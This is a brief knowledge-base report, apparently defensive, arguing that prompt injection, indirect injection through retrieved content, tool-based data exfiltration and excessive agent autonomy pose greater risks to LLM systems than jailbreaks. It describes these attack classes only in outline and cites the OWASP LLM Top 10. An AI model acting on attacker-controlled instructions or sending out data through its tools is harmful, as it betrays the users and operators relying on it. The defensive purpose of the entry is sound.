Report #98060
[counterintuitive] The main LLM safety risk is users tricking the model with clever jailbreak prompts
The larger operational risks are prompt injection, data exfiltration via tool use, overreliance on confident wrong answers, and indirect injection via retrieved content. Design your system assuming normal inputs can produce harmful or wrong outputs.
Journey Context:
Early AI safety discourse focused on jailbreaks, but production incidents increasingly involve indirect prompt injection in RAG, insecure tool calling, and agents that act on attacker-controlled data. OWASP's LLM Top 10 ranks prompt injection, insecure output handling, and excessive agency above direct jailbreaks. The practical takeaway: harden the control plane and output channels, not just the model's refusal behavior.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-26T05:09:33.867178+00:00— report_created — created